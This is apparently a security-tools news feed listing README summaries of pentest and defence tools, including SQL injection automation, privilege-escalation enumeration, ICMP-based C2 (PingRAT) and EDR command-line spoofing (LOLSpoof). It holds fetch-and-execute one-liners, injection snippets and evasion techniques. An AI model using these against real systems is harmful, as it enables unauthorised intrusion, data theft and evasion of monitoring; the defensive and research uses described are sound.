❌

Normal view

There are new articles available, click to refresh the page.
Today β€” 19 May 2024Tools

JAW - A Graph-based Security Analysis Framework For Client-side JavaScript


An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

Release Notes:


Overview of JAW

The architecture of the JAW is shown below.

Test Inputs

JAW can be used in two distinct ways:

  1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

  2. Web Application Analysis: Analyze a web application by providing a single seed URL.

Data Collection

  • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

HPG Construction

  • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

  • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).

Analysis and Outputs

  • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

  • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

  • The outputs will be stored in the same folder as that of input.

Setup

The installation script relies on the following prerequisites: - Latest version of npm package manager (node js) - Any stable version of python 3.x - Python pip package manager

Afterwards, install the necessary dependencies via:

$ ./install.sh

For detailed installation instructions, please see here.

Quick Start

Running the Pipeline

You can run an instance of the pipeline in a background screen via:

$ python3 -m run_pipeline --conf=config.yaml

The CLI provides the following options:

$ python3 -m run_pipeline -h

usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

This script runs the tool pipeline.

optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

Quick Example

For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

Crawling and Data Collection

This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScipt file that you already have on your file system, you can skip this step.

JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

Playwright CLI with Foxhound

This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

Puppeteer CLI

To start the crawler, do:

$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

See here for more information.

Selenium CLI

To start the crawler, do:

$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d

Please refer to the documentation of the hpg_crawler here for more information.

Graph Construction

HPG Construction CLI

To generate an HPG for a given (set of) JavaScript file(s), do:

$ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG, must be i
--mode: determines the output format (csv or graphML)

HPG Import CLI

To import an HPG inside a neo4j graph database (docker instance), do:

$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h

usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

This script imports a CSV of a property graph into a neo4j docker database.

optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)

HPG Construction and Import CLI (v1)

In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

Specification of Parameters:

  • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
  • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
  • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
  • --hybrid=bool: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputing files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
  • --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of obsevered network requests, pass the string false to exclude (default: request_logs_short.out).
  • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
  • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
  • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

For more information, you can use the help CLI provided with the graph construction API:

$ python3 -m engine.api -h

Security Analysis

The constructed HPG can then be queried using Cypher or the NeoModel ORM.

Running Custom Graph traversals

You should place and run your queries in analyses/<ANALYSIS_NAME>.

Option 1: Using the NeoModel ORM (Deprecated)

You can use the NeoModel ORM to query the HPG. To write a query:

  • (1) Check out the HPG data model and syntax tree.
  • (2) Check out the ORM model for HPGs
  • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_orm  

For more information, please see here.

Option 2: Using Cypher Queries

You can use Cypher to write custom queries. For this:

  • (1) Check out the HPG data model and syntax tree.
  • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_cypher

For more information, please see here.

Vulnerability Detection

This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering

Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:

request_hijacking:
enabled: true
# [...]
#
domclobbering:
enabled: false
# [...]

cs_csrf:
enabled: false
# [...]

Step 2. Run an instance of the pipeline with:

$ python3 -m run_pipeline --conf=config.yaml

Hint. You can run multiple instances of the pipeline under different screens:

$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]

To generate parallel configuration files automatically, you may use the generate_config.py script.

How to Interpret the Output of the Analysis?

The outputs will be stored in a file called sink.flows.out in the same folder as that of the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a, semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point. However, a request marked with ['NON-REACH'] is not forgeable.

An example output entry is shown below:

[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href

This entry shows that on line 29, there is a $.ajax call expression, and this call expression triggers an ajax request with the url template value of ajaxloc + "/bearer1234/, where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, thus forgeable through ['WIN.LOC'].

Test Web Application

In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.

First, install the dependencies via:

$ cd tests/test-webapp
$ npm install

Then, run the application in a new screen:

$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

Detailed Documentation.

For more information, visit our wiki page here. Below is a table of contents for quick access.

The Web Crawler of JAW

Data Model of Hybrid Property Graphs (HPGs)

Graph Construction

Graph Traversals

Contribution and Code Of Conduct

Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

Academic Publication

If you use the JAW for academic research, we encourage you to cite the following paper:

@inproceedings{JAW,
title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
author= {Soheil Khodayari and Giancarlo Pellegrino},
booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
year = {2021},
address = {Vancouver, B.C.},
publisher = {{USENIX} Association},
}

Acknowledgements

JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels


First, a couple of useful oneliners ;)

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

Note that since version 2.10 you can serve the script to other hosts with the -S flag!


linux-smart-enumeration

Linux enumeration tools for pentesting and CTFs

This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

What is it?

This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p parameter.

It has 3 levels of verbosity so you can control how much information you see.

In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?

The idea is to get the information gradually.

First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.

If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r.

You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

Use: ./lse.sh [options]

OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.

Is it pretty?

Usage demo

Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample


Examples

Direct execution oneliners

bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


Before yesterdayTools

ShellSweep - PowerShell/Python/Lua Tool Designed To Detect Potential Webshell Files In A Specified Directory

Tags: Aspx, Encryption, Entropy, Hashes, Malware, Obfuscation, PowerShell, Processes, Scan, Scanning, Scripts, Toolbox, ShellSweep




ShellSweep - ShellSweeping the evil.


Shellsweep - Shellsweeping The Evil.


ShellSweep - ShellSweeping The Evil.




ShellSweep

ShellSweeping the evil

Why ShellSweep

"ShellSweep" is a PowerShell/Python/Lua tool designed to detect potential webshell files in a specified directory.

ShellSheep and it's suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is a characteristic of encrypted or obfuscated codes often found in webshells. - It only processes files with certain extensions (.asp, .aspx, .asph, .php, .jsp), which are commonly used in webshells. - Certain directories can be excluded from scanning. - Files with certain hashes can be ignored during the scan.


How does ShellSweep find the shells?

Entropy, in the context of information theory or data science, is a measure of the unpredictability, randomness, or disorder in a set of data. The concept was introduced by Claude Shannon in his 1948 paper "A Mathematical Theory of Communication".

When applied to a file or a string of text, entropy can help assess the randomness of the data. Here's how it works: If a file consists of completely random data (each byte is just as likely to be any value between 0 and 255), the entropy is high, close to 8 (since log2(256) = 8).

If a file consists of highly structured data (for example, a text file where most bytes are ASCII characters), the entropy is lower. In the context of finding webshells or malicious files, entropy can be a useful indicator: - Many obfuscated scripts or encrypted payloads can have high entropy because the obfuscation or encryption process makes the data look random. - A normal text file or HTML file would generally have lower entropy because human-readable text has patterns and structure (certain letters are more common, words are usually separated by spaces, etc.). So, a file with unusually high entropy might be suspicious and worth further investigation. However, it's not a surefire indicator of maliciousness -- there are plenty of legitimate reasons a file might have high entropy, and plenty of ways malware might avoid causing high entropy. It's just one tool in a larger toolbox for detecting potential threats.

ShellSweep includes a Get-Entropy function that calculates the entropy of a file's contents by: - Counting how often each character appears in the file. - Using these frequencies to calculate the probability of each character. - Summing -p*log2(p) for each character, where p is the character's probability. This is the formula for entropy in information theory.

ShellScan

ShellScan provides the ability to scan multiple known bad webshell directories and output the average, median, minimum and maximum entropy values by file extension.

Pass ShellScan.ps1 some directories of webshells, any size set. I used:

  • https://github.com/tennc/webshell
  • https://github.com/BlackArch/webshells
  • https://github.com/tarwich/jackal/blob/master/libraries/

This will give a decent training set to get entropy values.

Output example:

Statistics for .aspx files:
Average entropy: 4.94212121048115
Minimum entropy: 1.29348709979974
Maximum entropy: 6.09830238020383
Median entropy: 4.85437969842084
Statistics for .asp files:
Average entropy: 5.51268104400858
Minimum entropy: 0.732406213077191
Maximum entropy: 7.69241278153711
Median entropy: 5.57351177724806

ShellCSV

First, let's break down the usage of ShellCSV and how it assists with identifying entropy of the good files on disk. The idea is that defenders can run this on web servers to gather all files and entropy values to better understand what paths and extensions are most prominent in their working environment.

See ShellCSV.csv as example output.

ShellSweep

First, choose your flavor: Python, PowerShell or Lua.

  • Based on results from ShellScan or ShellCSV, modify entropy values as needed.
  • Modify file extensions as needed. No need to look for ASPX on a non-ASPX app.
  • Modify paths. I don't recommend just scanning all the C:\, lots to filter.
  • Modify any filters needed.
  • Run it!

If you made it here, this is the part where you iterate on tuning. Find new shell? Gather entropy and modify as needed.

Questions

Feel free to open a Git issue.

Thank You

If you enjoyed this project, be sure to star the project and share with your family and friends.



Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)


Retrieve and display information about active user sessions on remote computers. No admin privileges required.

The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.

If the -CheckAdminAccess switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results)

It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.


Usage:

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

Invoke-SessionHunter

Gather sessions by authenticating to targets where you have local admin access

Invoke-SessionHunter -CheckAsAdmin

You can optionally provide credentials in the following format

Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

This works in cobination with -Timeout | Default = 2, increase for slower networks.

Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -FailSafe -Timeout 5

Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

Invoke-SessionHunter -Match

All switches can be combined

Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

Specify the target domain

Invoke-SessionHunter -Domain contoso.local

Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

Retrieve and display information about active user sessions on servers only

Invoke-SessionHunter -Servers

Retrieve and display information about active user sessions on workstations only

Invoke-SessionHunter -Workstations

Show active session for the specified user only

Invoke-SessionHunter -Hunt "Administrator"

Exclude localhost from the sessions retrieval

Invoke-SessionHunter -IncludeLocalHost

Return custom PSObjects instead of table-formatted results

Invoke-SessionHunter -RawResults

Do not run a port scan to enumerate for alive hosts before trying to retrieve sessions

Note: if a host is not reachable it will hang for a while

Invoke-SessionHunter -NoPortScan


Subhunter - A Fast Subdomain Takeover Tool


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone [email protected]:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
...

async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...

if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())

Now that eveything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}


BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses


The original 403fuzzer.py :)

Fuzz 401/403ing endpoints for bypasses

This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.

It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.

I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

You can now feed it raw HTTP requests that you save to a file from Burp.

Follow me on twitter! @intrudir


Usage

usage: bypassfuzzer.py -h

Specifying a request to test

Best method: Feed it a raw HTTP request from Burp!

Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests

python3 bypassfuzzer.py -r request.txt

Using other flags

Specify a URL

python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

Specify cookies to use in requests:
some examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"

Specify a method/verb and body data to send

bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>

Specify -H "header: value" for each additional header you'd like to add:

bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

Smart filter feature!

Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

Repeats are changeable in the code until I add an option to specify it in flag

NOTE: Can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart

Specify a proxy to use

Useful if you wanna proxy through Burp

bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

Skip sending header payloads or url payloads

# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers

# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls

Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638

TODO

  • [x] Automatically check other methods/verbs for bypass
  • [x] absolute domain attack
  • [ ] Add HTTP/2 support
  • [ ] Looking for ideas. Ping me on twitter! @intrudir


PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads


PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

Features:

  • Uses ICMP for Command and Control
  • Undetectable by most AV/EDR solutions
  • Written in Go

Installation:

Download the binaries

or build the binaries and you are ready to go:

$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go

Usage:

Server:

./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)

Client:

./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)



LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line


LOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawned process. Just call your incriminate-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.


Why

Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.

How

  1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
  2. Spawns that suspended LOLBin with the spoofed command line
  3. Gets the remote PEB address
  4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
  5. Gets the address of the command line unicode buffer
  6. Overrides the fake command line with the real one
  7. Resumes the main thread

Opsec considerations

Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry: 1. Creation of suspended process 2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead) 3. Write to the spawned process with WriteProcessMemory

Build

Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

nimble install winim

Known issue

Programs that clear or change the previous printed console messages (such as timeout.exe 10) breaks the program. when such commands are employed, you'll need to restart the console. Don't know how to fix that, open to suggestions.



SQLMC - Check All Urls Of A Domain For SQL Injections


SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

Features

  • Scans a domain for SQL injection vulnerabilities
  • Crawls the given URL up to a specified depth
  • Checks each link for SQL injection vulnerabilities
  • Reports vulnerabilities along with server information and depth

Installation

  1. Install the required dependencies: bash pip3 install sqlmc

Usage

Run sqlmc with the following command-line arguments:

  • -u, --url: The URL to scan (required)
  • -d, --depth: The depth to scan (required)
  • -o, --output: The output file to save the results

Example usage:

sqlmc -u http://example.com -d 2

Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

The tool will then perform the scan and display the results.

ToDo

  • Check for multiple GET params
  • Better injection checker trigger methods

Credits

License

This project is licensed under the GNU Affero General Public License v3.0.



BadExclusionsNWBO - An Evolution From BadExclusions To Identify Folder Custom Or Undocumented Exclusions On AV/EDR


BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.

How it works?

